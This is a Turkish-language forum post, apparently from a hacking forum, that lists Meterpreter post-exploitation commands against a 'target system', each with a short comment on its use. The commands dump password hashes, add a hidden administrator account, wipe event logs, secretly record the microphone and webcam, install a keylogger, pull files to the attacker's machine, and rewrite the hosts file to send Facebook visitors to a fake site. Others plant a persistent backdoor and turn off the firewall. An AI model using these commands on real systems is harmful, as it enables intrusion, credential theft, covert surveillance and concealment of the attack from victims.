View hidden content is available for registered users!
METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR
Code:
İpconfig --a//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.
Code:
Sysinfo//Hedef Sistem Hakkında Bilgi Alınır.
Code:
Getuid//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.
Code:
Getpid//Mevcut Sistem Pid Numarasını Gösterir
Code:
run hashdump//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.
Code:
shell
net user test sifre (add
net user test /active:yes
net localgroup Administrators test /add//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu ile yeni kullanıcı oluşturabiliriz.
Code:
clearev//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.
Code:
run event_manager –c//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.
Code:
screenshot –p /root/ekrangoruntusu.jpeg –q 60//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.
Code:
record_mic –d 60 -f /root/seskaydi.wav//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi yapılabilir.
Code:
webcam_list//hedef sistemdeki kameralar listelenir.
Code:
webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false//hedef sistemin webcami kullnılarak goruntuler alınır.
Code:
pwd//Bulunulan dizinin ismini verir.
Code:
run keylogrecorder//Hedef Sisteme Keylogger yükleyebiliriz.
Code:
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili bilgileri görebilirsiniz.
Run Komutu İle Kullanabileceğimiz scriptleri: /opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.
Code:
run winenum//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik çalıştırarark
sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.
Code:
upload /root/dosya c:\Windows//hedef sisteme kali sunucudan dosya upload edebiliriz.
Code:
download f:\\iplisteleri.txt /root/Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.
Code:
run get_application_list//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti kullanabiliriz.
Code:
run getgui -u ali –p 12345//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu kullanıcı ile rdp yapabiliriz.
Code:
cat /root/sahtehostdosyasi.txt
192.168.10.23 facebook.com
192.168.10.23 www.facebook.com
run hostedit -l /rootsahtehostdosyasi.txt//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti // ile bu dosyayı belirterek
hedef sistemin host dosyası değiştirilmiş olur.
// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper
//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.
Code:
run metsvc//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.
Code:
cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure
//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e
//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.
Not:Bilmediklerim Vardı İlkten Bildiklerimi Yazdım Sonra Arşivden Bilmediklerimi Ekledim
